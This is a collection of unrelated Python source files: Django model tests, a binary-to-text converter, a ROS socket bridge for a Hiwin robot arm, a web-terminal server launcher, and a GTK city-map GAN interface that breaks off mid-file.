saved. a9 = Article( headline='Article 9', pub_date=datetime(2005, 7, 31, 12, 30, 45, 180), ) a9.save() self.assertEqual( Article.objects.get(id__exact=a9.id).pub_date, datetime(2005, 7, 31, 12, 30, 45), ) @skipIfDBFeature('supports_microsecond_precision') def test_microsecond_precision_not_supported_edge_case(self): # In MySQL, microsecond-level precision isn't always available. You'll # lose microsecond-level precision once the data is saved. a = Article.objects.create( headline='Article', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertEqual( Article.objects.get(pk=a.pk).pub_date, datetime(2008, 12, 31, 23, 59, 59), ) def test_manually_specify_primary_key(self): # You can manually specify the primary key when creating a new object. a101 = Article( id=101, headline='Article 101', pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a101.save() a101 = Article.objects.get(pk=101) self.assertEqual(a101.headline, 'Article 101') def test_create_method(self): # You can create saved objects in a single step a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) self.assertEqual(Article.objects.get(headline="Article 10"), a10) def test_year_lookup_edge_case(self): # Edge-case test: A year lookup should retrieve all objects in # the given year, including Jan. 1 and Dec. 31. Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) self.assertQuerysetEqual(Article.objects.filter(pub_date__year=2008), ["<Article: Article 11>", "<Article: Article 12>"]) def test_unicode_data(self): # Unicode data works, too. a = Article( headline='\u6797\u539f \u3081\u3050\u307f', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f') def test_hash_function(self): # Model instances have a hash function, so they can be used in sets # or as dictionary keys. Two models compare as equal if their primary # keys are equal. a10 = Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) a11 = Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) a12 = Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) s = {a10, a11, a12} self.assertIn(Article.objects.get(headline='Article 11'), s) def test_field_ordering(self): """ Field instances have a `__lt__` comparison function to define an ordering based on their creation. Prior to #17851 this ordering comparison relied on the now unsupported `__cmp__` and was assuming compared objects were both Field instances raising `AttributeError` when it should have returned `NotImplemented`. """ f1 = Field() f2 = Field(auto_created=True) f3 = Field() self.assertLess(f2, f1) self.assertGreater(f3, f1) self.assertIsNotNone(f1) self.assertNotIn(f2, (None, 1, '')) def test_extra_method_select_argument_with_dashes_and_values(self): # The 'select' argument to extra() supports names with dashes in # them, as long as you use values(). Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) dicts = Article.objects.filter( pub_date__year=2008).extra( select={'dashed-value': '1'}).values('headline', 'dashed-value') self.assertEqual([sorted(d.items()) for d in dicts], [[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]]) def test_extra_method_select_argument_with_dashes(self): # If you use 'select' with extra() and names containing dashes on a # query that's *not* a values() query, those extra 'select' values # will silently be ignored. Article.objects.create( headline="Article 10", pub_date=datetime(2005, 7, 31, 12, 30, 45), ) Article.objects.create( headline='Article 11', pub_date=datetime(2008, 1, 1), ) Article.objects.create( headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999), ) articles = Article.objects.filter( pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'}) self.assertEqual(articles[0].undashedvalue, 2) def test_create_relation_with_ugettext_lazy(self): """ Test that ugettext_lazy objects work when saving model instances through various methods. Refs #10498. """ notlazy = 'test' lazy = ugettext_lazy(notlazy) Article.objects.create(headline=lazy, pub_date=datetime.now()) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # test that assign + save works with Promise objects article.headline = lazy article.save() self.assertEqual(article.headline, notlazy) # test .update() Article.objects.update(headline=lazy) article = Article.objects.get() self.assertEqual(article.headline, notlazy) # still test bulk_create() Article.objects.all().delete() Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())]) article = Article.objects.get() self.assertEqual(article.headline, notlazy) def test_emptyqs(self): # Can't be instantiated with self.assertRaises(TypeError): EmptyQuerySet() self.assertIsInstance(Article.objects.none(), EmptyQuerySet) def test_emptyqs_values(self): # test for #15959 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): qs = Article.objects.none().values_list('pk') self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(len(qs), 0) def test_emptyqs_customqs(self): # A hacky test for custom QuerySet subclass - refs #17271 Article.objects.create(headline='foo', pub_date=datetime.now()) class CustomQuerySet(QuerySet): def do_something(self): return 'did something' qs = Article.objects.all() qs.__class__ = CustomQuerySet qs = qs.none() with self.assertNumQueries(0): self.assertEqual(len(qs), 0) self.assertIsInstance(qs, EmptyQuerySet) self.assertEqual(qs.do_something(), 'did something') def test_emptyqs_values_order(self): # Tests for ticket #17712 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().filter( id__in=Article.objects.values_list('id', flat=True))), 0) @skipUnlessDBFeature('can_distinct_on_fields') def test_emptyqs_distinct(self): # Tests for #19426 Article.objects.create(headline='foo', pub_date=datetime.now()) with self.assertNumQueries(0): self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0) def test_ticket_20278(self): sr = SelfRef.objects.create() with self.assertRaises(ObjectDoesNotExist): SelfRef.objects.get(selfref=sr) def test_eq(self): self.assertEqual(Article(id=1), Article(id=1)) self.assertNotEqual(Article(id=1), object()) self.assertNotEqual(object(), Article(id=1)) a = Article() self.assertEqual(a, a) self.assertNotEqual(Article(), a) def test_hash(self): # Value based on PK self.assertEqual(hash(Article(id=1)), hash(1)) with self.assertRaises(TypeError): # No PK value -> unhashable (because save() would then change # hash) hash(Article()) class ModelLookupTest(TestCase): def setUp(self): # Create an Article. self.a = Article( id=None, headline='Swallow programs in Python', pub_date=datetime(2005, 7, 28), ) # Save it into the database. You have to call save() explicitly. self.a.save() def test_all_lookup(self): # Change values by changing the attributes, then calling save(). self.a.headline = 'Parrot programs in Python' self.a.save() # Article.objects.all() returns all the articles in the database. self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>']) def test_rich_lookup(self): # Django provides a rich database lookup API. self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a) self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a) self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a) self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a) def test_equal_lookup(self): # The "__exact" lookup type can be omitted, as a shortcut. self.assertEqual(Article.objects.get(id=self.a.id), self.a) self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2004), [], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__year=2005, pub_date__month=7), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=5), ['<Article: Swallow programs in Python>'], ) self.assertQuerysetEqual( Article.objects.filter(pub_date__week_day=6), [], ) def test_does_not_exist(self): # Django raises an Article.DoesNotExist exception for get() if the # parameters don't match any object. six.assertRaisesRegex( self, ObjectDoesNotExist, "Article matching query does not exist.", Article.objects.get, id__exact=2000, ) # To avoid dict-ordering related errors check only one lookup # in single assert. self.assertRaises( ObjectDoesNotExist, Article.objects.get, pub_date__year=2005, pub_date__month=8, ) six.assertRaisesRegex( self, ObjectDoesNotExist, "Article matching query does not exist.", Article.objects.get, pub_date__week_day=6, ) def test_lookup_by_primary_key(self): # Lookup by a primary key is the most common case, so Django # provides a shortcut for primary-key exact lookups. # The following is identical to articles.get(id=a.id). self.assertEqual(Article.objects.get(pk=self.a.id), self.a) # pk can be used as a shortcut for the primary key name in any query. self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"]) # Model instances of the same type and same ID are considered equal. a = Article.objects.get(pk=self.a.id) b = Article.objects.get(pk=self.a.id) self.assertEqual(a, b) def test_too_many(self): # Create a very similar object a = Article( id=None, headline='Swallow bites Python', pub_date=datetime(2005, 7, 28), ) a.save() self.assertEqual(Article.objects.count(), 2) # Django raises an Article.MultipleObjectsReturned exception if the # lookup matches more than one object six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, headline__startswith='Swallow', ) six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, pub_date__year=2005, ) six.assertRaisesRegex( self, MultipleObjectsReturned, "get\(\) returned more than one Article -- it returned 2!", Article.objects.get, pub_date__year=2005, pub_date__month=7, ) class ConcurrentSaveTests(TransactionTestCase): available_apps = ['basic'] @skipUnlessDBFeature('test_db_allows_multiple_connections') def test_concurrent_delete_with_save(self): """ Test fetching, deleting and finally saving an object - we should get an insert in this case. """ a = Article.objects.create(headline='foo', pub_date=datetime.now()) exceptions = [] def deleter(): try: # Do not delete a directly - doing so alters its state. Article.objects.filter(pk=a.pk).delete() except Exception as e: exceptions.append(e) finally: connections[DEFAULT_DB_ALIAS].close() self.assertEqual(len(exceptions), 0) t = threading.Thread(target=deleter) t.start() t.join() a.save() self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo') class ManagerTest(SimpleTestCase): QUERYSET_PROXY_METHODS = [ 'none', 'count', 'dates', 'datetimes', 'distinct', 'extra', 'get', 'get_or_create', 'update_or_create', 'create', 'bulk_create', 'filter', 'aggregate', 'annotate', 'complex_filter', 'exclude', 'in_bulk', 'iterator', 'earliest', 'latest', 'first', 'last', 'order_by', 'select_for_update', 'select_related', 'prefetch_related', 'values', 'values_list', 'update', 'reverse', 'defer', 'only', 'using', 'exists', '_insert', '_update', 'raw', ] def test_manager_methods(self): """ This test ensures that the correct set of methods from `QuerySet` are copied onto `Manager`. It's particularly useful to prevent accidentally leaking new methods into `Manager`. New `QuerySet` methods that should also be copied onto `Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`. """ self.assertEqual( sorted(BaseManager._get_queryset_methods(QuerySet).keys()), sorted(self.QUERYSET_PROXY_METHODS), ) class SelectOnSaveTests(TestCase): def test_select_on_save(self): a1 = Article.objects.create(pub_date=datetime.now()) with self.assertNumQueries(1): a1.save() asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(2): asos.save() with self.assertNumQueries(1): asos.save(force_update=True) Article.objects.all().delete() with self.assertRaises(DatabaseError): with self.assertNumQueries(1): asos.save(force_update=True) def test_select_on_save_lying_update(self): """ Test that select_on_save works correctly if the database doesn't return correct information about matched rows from UPDATE. """ # Change the manager to not return "row matched" for update(). # We are going to change the Article's _base_manager class # dynamically. This is a bit of a hack, but it seems hard to # test this properly otherwise. Article's manager, because # proxy models use their parent model's _base_manager. orig_class = Article._base_manager.__class__ class FakeQuerySet(QuerySet): # Make sure the _update method below is in fact called. called = False def _update(self, *args, **kwargs): FakeQuerySet.called = True super(FakeQuerySet, self)._update(*args, **kwargs) return 0 class FakeManager(orig_class): def get_queryset(self): return FakeQuerySet(self.model) try: Article._base_manager.__class__ = FakeManager asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now()) with self.assertNumQueries(3): asos.save() self.assertTrue(FakeQuerySet.called) # This is not wanted behavior, but this is how Django has always # behaved for databases that do not return correct information # about matched rows for UPDATE. with self.assertRaises(DatabaseError): asos.save(force_update=True) with self.assertRaises(DatabaseError): asos.save(update_fields=['pub_date']) finally: Article._base_manager.__class__ = orig_class class ModelRefreshTests(TestCase): def _truncate_ms(self, val): # MySQL < 5.6.4 removes microseconds from the datetimes which can cause # problems when comparing the original value to that loaded from DB return val - timedelta(microseconds=val.microsecond) def test_refresh(self): a = Article.objects.create(pub_date=self._truncate_ms(datetime.now())) Article.objects.create(pub_date=self._truncate_ms(datetime.now())) Article.objects.filter(pk=a.pk).update(headline='new headline') with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.headline, 'new headline') orig_pub_date = a.pub_date new_pub_date = a.pub_date + timedelta(10) Article.objects.update(headline='new headline 2', pub_date=new_pub_date) with self.assertNumQueries(1): a.refresh_from_db(fields=['headline']) self.assertEqual(a.headline, 'new headline 2') self.assertEqual(a.pub_date, orig_pub_date) with self.assertNumQueries(1): a.refresh_from_db() self.assertEqual(a.pub_date, new_pub_date) def test_refresh_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create() s3 = SelfRef.objects.create(selfref=s1) s3_copy = SelfRef.objects.get(pk=s3.pk) s3_copy.selfref.touched = True s3.selfref = s2 s3.save() with self.assertNumQueries(1): s3_copy.refresh_from_db() with self.assertNumQueries(1): # The old related instance was thrown away (the selfref_id has # changed). It needs to be reloaded on access, so one query # executed. self.assertFalse(hasattr(s3_copy.selfref, 'touched')) self.assertEqual(s3_copy.selfref, s2) def test_refresh_null_fk(self): s1 = SelfRef.objects.create() s2 = SelfRef.objects.create(selfref=s1) s2.selfref = None s2.refresh_from_db() self.assertEqual(s2.selfref, s1) def test_refresh_unsaved(self): pub_date = self._truncate_ms(datetime.now()) a = Article.objects.create(pub_date=pub_date) a2 = Article(id=a.pk) with self.assertNumQueries(1): a2.refresh_from_db() self.assertEqual(a2.pub_date, pub_date) self.assertEqual(a2._state.db, "default") def test_refresh_fk_on_delete_set_null(self): a = Article.objects.create( headline='Parrot programs in Python', pub_date=datetime(2005, 7, 28), ) s1 = SelfRef.objects.create(article=a) a.delete() s1.refresh_from_db() self.assertIsNone(s1.article_id) self.assertIsNone(s1.article) def test_refresh_no_fields(self): a = Article.objects.create(pub_date=self._truncate_ms(datetime.now())) with self.assertNumQueries(0): a.refresh_from_db(fields=[]) class TestRelatedObjectDeprecation(SimpleTestCase): def test_field_related_deprecation(self): field = SelfRef._meta.get_field('selfref') with warnings.catch_warnings(record=True) as warns: warnings.simplefilter('always') self.assertIsInstance(field.related, ForeignObjectRel) self.assertEqual(len(warns), 1) self.assertEqual( str(warns.pop().message), 'Usage of field.related has been deprecated. Use field.remote_field instead.' )
bintotxt.py
import os import numpy as np import sys from multiprocessing import Process import time import subprocess def bin2float(file,dtype): if file.endswith(".bin"): if dtype == "fp32": data = np.fromfile(file,dtype='float32') elif dtype == "fp16": data = np.fromfile(file,dtype='float16') elif dtype == "int32": data = np.fromfile(file,dtype=np.int32) elif dtype == "int8": data = np.fromfile(file,dtype=np.int8) else: print("Input dtype error!") return 0 float_file=file+".txt" print("save the file: "+float_file) np.savetxt(float_file,data.reshape(-1,1),fmt='%.6f') def bintofloat(filename,dtype): if os.path.isdir(filename): process= [] i=0 for file in os.listdir(filename): if(file != "." and file !=".."): process.append(Process(target=bin2float, args=(filename+file,dtype,))) process[i].start() i +=1 else: bin2float(filename,dtype) if __name__ == "__main__": subprocess.run("ulimit -n 65535",shell=True,cwd="./") print("params: " + sys.argv[1] + "," + sys.argv[2]) bintofloat(sys.argv[1],sys.argv[2])
HiwinRA605_socket_ros_test_20190626131757.py
#!/usr/bin/env python3 # license removed for brevity #接收策略端命令 用Socket傳輸至控制端電腦 import socket ##多執行序 import threading import time ## import sys import os import numpy as np import rospy import matplotlib as plot from std_msgs.msg import String from ROS_Socket.srv import * from ROS_Socket.msg import * import HiwinRA605_socket_TCPcmd as TCP import HiwinRA605_socket_Taskcmd as Taskcmd import enum Socket = 0 data = '0' #設定傳輸資料初始值 Arm_feedback = 1 #假設手臂忙碌 state_feedback = 0 NAME = 'socket_server' client_response = 0 #回傳次數初始值 point_data_flag = False arm_mode_flag = False speed_mode_flag = False Socket_sent_flag = False ##------------class pos------- class point(): def __init__(self, x, y, z, pitch, roll, yaw): self.x = x self.y = y self.z = z self.pitch = pitch self.roll = roll self.yaw = yaw pos = point(0,36.8,11.35,-90,0,0) ##------------class socket_cmd--------- class socket_cmd(): def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode): self.grip = grip self.setvel = setvel self.ra = ra self.delay = delay self.setboth = setboth self.action = action self.Speedmode = Speedmode ##-----------switch define------------## class switch(object): def __init__(self, value): self.value = value self.fall = False def __iter__(self): """Return the match method once, then stop""" yield self.match raise StopIteration def match(self, *args): """Indicate whether or not to enter a case suite""" if self.fall or not args: return True elif self.value in args: # changed for v1.5, see below self.fall = True return True else: return False ##-----------client feedback arm state---------- def socket_client_arm_state(Arm_state): global state_feedback rospy.wait_for_service('arm_state') try: Arm_state_client = rospy.ServiceProxy('arm_state', arm_state) state_feedback = Arm_state_client(Arm_state) #pos_feedback_times = pos_feedback.response return state_feedback except rospy.ServiceException as e: print ("Service call failed: %s"%e) ##----------socket sent data flag------------- def socket_client_sent_flag(Sent_flag): global sent_feedback rospy.wait_for_service('sent_flag') try: Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag) sent_feedback = Sent_flag_client(Sent_flag) #pos_feedback_times = pos_feedback.response return sent_feedback except rospy.ServiceException as e: print ("Service call failed: %s"%e) ##-----------client feedback arm state end---------- ##------------server 端------- def point_data(req): ##接收策略端傳送位姿資料 global client_response,point_data_flag pos.x = '%s'%req.x pos.y = '%s'%req.y pos.z = '%s'%req.z pos.pitch = '%s'%req.pitch pos.roll = '%s'%req.roll pos.yaw = '%s'%req.yaw point_data_flag = True client_response = client_response + 1 #Socket_command() return(client_response) ##----------Arm Mode-------------### def Arm_Mode(req): ##接收策略端傳送手臂模式資料 global arm_mode_flag socket_cmd.action = int('%s'%req.action) socket_cmd.grip = int('%s'%req.grip) socket_cmd.ra = int('%s'%req.ra) socket_cmd.setvel = int('%s'%req.vel) socket_cmd.setboth = int('%s'%req.both) arm_mode_flag = True Socket_command() print("cmd") return(1) ##-------Arm Speed Mode------------### def Speed_Mode(req): ##接收策略端傳送手臂模式資料 global speed_mode_flag socket_cmd.Speedmode = int('%s'%req.Speedmode) speed_mode_flag = True #Socket_command() return(1) # def Grip_Mode(req): ##接收策略端傳送夾爪動作資料 # socket_cmd.grip = int('%s'%req.grip) # return(1) def socket_server(): ##創建Server node rospy.init_node(NAME) a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data print ("Ready to connect") rospy.spin() ## spin one ##------------server 端 end------- ##----------socket 封包傳輸--------------## ##---------------socket 傳輸手臂命令----------------- def Socket_command(): global arm_mode_flag,speed_mode_flag,point_data_flag if arm_mode_flag == True: arm_mode_flag = False speed_mode_flag = False point_data_flag = False for case in switch(socket_cmd.action): #-------PtP Mode-------- if case(Taskcmd.Action_Type.PtoP): for case in switch(socket_cmd.setboth): if case(Taskcmd.Ctrl_Mode.CTRL_POS): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_EULER): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_BOTH): data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break break #-------Line Mode-------- if case(Taskcmd.Action_Type.Line): for case in switch(socket_cmd.setboth): if case(Taskcmd.Ctrl_Mode.CTRL_POS): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel) break if case(Taskcmd.Ctrl_Mode.CTRL_EULER): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel ) break if case(Taskcmd.Ctrl_Mode.CTRL_BOTH): data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel ) break break #-------設定手臂速度-------- if case(Taskcmd.Action_Type.SetVel): data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel) break #-------設定手臂Delay時間-------- if case(Taskcmd.Action_Type.Delay): data = TCP.SetDelay(socket_cmd.grip,0) break #-------設定手臂急速&安全模式-------- if case(Taskcmd.Action_Type.Mode): data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode) break socket_cmd.action= 5 ##切換初始mode狀態 Socket.send(data.encode('utf-8'))#socket傳送for python to translate str ##-----------socket client-------- def socket_client(): global Socket,Arm_feedback,data,Socket_sent_flag try: Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin #s.connect(('192.168.1.102', 8080))#iclab computerx except socket.error as msg: print(msg) sys.exit(1) print('Connection has been successful') print(Socket.recv(1024)) #start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令 start_input = 1 if start_input==1: while 1: feedback_str = Socket.recv(1024) #手臂端傳送手臂狀態 if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令 Arm_feedback = 0 socket_client_arm_state(Arm_feedback) #print("isbusy false") if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令 Arm_feedback = 1 socket_client_arm_state(Arm_feedback) #print("isbusy true") if str(feedback_str[2]) == '54':# 6 策略完成 Arm_feedback = 6 socket_client_arm_state(Arm_feedback) print("shutdown") #確認傳送旗標 if str(feedback_str[4]) == '48':#回傳0 false print(2222222222) Socket_sent_flag = False socket_client_sent_flag(Socket_sent_flag) if str(feedback_str[4]) == '49':#回傳1 true print(111111111111) Socket_sent_flag = True socket_client_sent_flag(Socket_sent_flag) feedback_check = TCP.feedback_check() Socket.send(feedback_check.encode('utf-8'))#socket傳送for python to translate str ##---------------socket 傳輸手臂命令 end----------------- if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown: break if start_input == 3: rospy.on_shutdown(myhook) rospy.on_shutdown(myhook) Socket.close() ##-----------socket client end-------- ##-------------socket 封包傳輸 end--------------## ## 多執行緒 def thread_test(): socket_client() ## 多執行序 end def myhook(): print ("shutdown time!") if __name__ == '__main__': socket_cmd.action = 5##切換初始mode狀態 t = threading.Thread(target=thread_test) t.start() # 開啟多執行緒 socket_server() t.join() # Ctrl+K Ctrl+C 添加行注释 Add line comment # Ctrl+K Ctrl+U 删除行注释 Remove line comment #Ctrl+] / [ 缩进/缩进行 Indent/outdent line
webxterm.py
import os import sys import socket import platform from threading import Thread sys.path.append(os.path.dirname(os.path.abspath(__file__)) + '/../') from lib.server import websocketserver shutdown_bind_address = "localhost" shutdown_port = 8898 bind_address = "0.0.0.0" port = 8899 shutdown_command = b"\x1b[^shutdown\x1b\\" check_health_command = b'\x1b[^Hello\x1b\\' reply_health_command = b'\x1b[^Hi\x1b\\' __author__ = 'liaobaikai <baikai.liao@qq.com>' __version__ = '0.3' __status__ = "production" __date__ = "2019-11-18(created) -> 2020-02-10(updated)" # 创建一个客户端,与服务器进行通讯,发送关闭服务器的指令,让服务器执行shutdown()。 def shutdown(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: try: sock.connect((shutdown_bind_address, shutdown_port)) sock.sendall(shutdown_command) except ConnectionRefusedError: print('ERROR: Could not contact [%s:%s]. Server may not be running.' % (shutdown_bind_address, shutdown_port)) # 检查主服务器的健康状态 def check_server(): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: try: sock.connect((shutdown_bind_address, shutdown_port)) sock.sendall(check_health_command) if sock.recv(64) == reply_health_command: print('Server running...') except ConnectionRefusedError: print('Server not running!') # 启动服务器 def startup(): # 打印相关信息 # print_base_info() # 初始化服务器 server = websocketserver.WebSocketServer((bind_address, port), websocketserver.WebSocketServerRequestHandler) # 查看端口是否被占用 server.server_activate() # 不是Windows系统的话,切换到守护进程 # if hasattr(os, "fork"): # daemon(get_pid_file()) # 启动服务器 try: server.serve_forever() except KeyboardInterrupt: print('shutdown server...') def shutdown_server(): server.sd_server.shutdown() server.shutdown() Thread(target=shutdown_server).start() # try: # os.remove(get_pid_file()) # except FileNotFoundError: # pass # 关闭服务器 # def kill(): # if os.path.exists(get_pid_file()) is False: # print("PID file not exists!") # return # with open(get_pid_file()) as f: # pid = f.read() # try: # os.kill(int(pid), signal.SIGTERM) # except ProcessLookupError as ple: # print(ple) # finally: # try: # os.remove(get_pid_file()) # except OSError: # pass if __name__ == '__main__': if len(sys.argv) > 1: commands = sys.argv[-1] if commands == 'start': startup() elif commands == 'run': startup() elif commands == 'stop': shutdown() # elif commands == 'stop-force': # kill() elif commands == 'version': # print_base_info() try: fs = platform.platform().split('-') os_name = fs[0] os_version = fs[1] architecture = fs[2] except ValueError as e: os_name = platform.platform(aliased=True, terse=True) os_version = platform.version() architecture = platform.architecture()[0] print('Server version: ', __version__) print('OS Name: ', os_name) print('OS Version: ', os_version) print('Architecture: ', architecture) print('Python build: ', platform.python_build()[0]) elif commands == 'status': # print_base_info() # print('Using server pid file: ', get_pid_file()) # if os.path.exists(get_pid_file()): # with open(get_pid_file()) as pf: # print('Using PID: ', pf.read()) # # # print('Using server bind: ', bind_address) # print('Using server port: ', port) # print('Using server sd port: ', shutdown_port) check_server() else: print('Usage: webxterm ( commands ... )') print('commands:') print(' run: Start Server in the current window') print(' start: Start Server in a separate window') print(' stop: Stop Server, waiting up to 5 seconds for the process to end') print(' status: View running Server status') print(' version: What version of server are you running?') else: startup()
threaded_gui.py
from gi.repository import Gtk, Gdk, GdkPixbuf from citygan import CityGan from time import process_time import numpy as np import citygan_util import threading, queue import os import pix2pix_citygenerator class GanCities(Gtk.Window): def __init__(self): super(GanCities, self).__init__() try: self.generator = CityGan() self.pix2pix = pix2pix_citygenerator.pix2pix_citygen() except OSError: print("Models should be loaded in ./models/") print("Failed to load modules. Exiting gracefully.") exit(1) self.current_model = 0 self.map_data = np.full(fill_value=192, shape=[256, 256, 3]) self.map_array = self.map_data.astype(np.uint8) self.pixbuf = GdkPixbuf.Pixbuf.new_from_data(self.map_array.tobytes(), GdkPixbuf.Colorspace.RGB, False, 8, self.map_data.shape[1], self.map_data.shape[1], self.map_data.shape[1] * 3) self.q = queue.Queue() thread = threading.Thread(target=self.get_work) thread.daemon = True thread.start() self.initialize_ui() def get_work(self): while True: self.q.get() def initialize_ui(self): # Layout self.horiz_box = Gtk.Box() self.resize(600, 400) self.options_book = Gtk.Notebook() self.model_select_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) self.gan_options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) self.pix2pix_options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) self.options_book.append_page(child=self.gan_options_box, tab_label=Gtk.Label(label="GanCities")) self.options_book.append_page(child=self.pix2pix_options_box, tab_label=Gtk.Label(label="pix2pix")) self.image_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) self.appstatus = Gtk.Label(label="") self.appstatus.set_xalign(0.0) self.horiz_box.pack_start(self.options_book, False, True, 10) self.horiz_box.pack_start(self.image_box, True, True, 10) self.set_title("GanCities") self.connect("check_resize", self.on_check_resize) self.connect("delete-event", Gtk.main_quit) # Image Display self.image_area = Gtk.Image() self.image_area.connect("draw", self.on_draw) self.image_box.pack_start(self.image_area, True, True, 10) # Dimensions # self.dim_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL) # self.dimlabel1 = Gtk.Label(label="Map Dimensions") # self.dimlabel2 = Gtk.Label(label="x") # dim_xadjustment = Gtk.Adjustment(value=400, lower=200, upper=3440, step_increment=10) # dim_yadjustment = Gtk.Adjustment(value=400, lower=200, upper=3440, step_increment=10) # self.xspinner = Gtk.SpinButton(numeric=True, adjustment=dim_xadjustment) # self.yspinner = Gtk.SpinButton(numeric=True, adjustment=dim_yadjustment) # self.dim_box.pack_start(self.dimlabel1, True, True, 0) # self.dim_box.pack_start(self.xspinner, True, True, 0) # self.dim_box.pack_start(self.dimlabel2, True, True, 0) # self.dim_box.pack_start(self.yspinner, True, True, 0) # Make Map button self.gan_generate_button = Gtk.Button(label="Make a map") self.gan_generate_button.connect("clicked", self.gan_generate_clicked) self.gan_save_button = Gtk.Button(label="Save Map") self.gan_save_button.connect("clicked", self.save_map_clicked) self.gan_save_button.set_sensitive(False) self.pix2pix_save_button = Gtk.Button(label="Save Map") self.pix2pix_save_button.connect("clicked", self.save_map_clicked) self.pix2pix_save_button.set_sensitive(False) # pix2pix Model # Load Image self.load_button = Gtk.Button(label="Load PNG") self.load_button.connect("clicked", self.on_load_clicked) # Generate Map 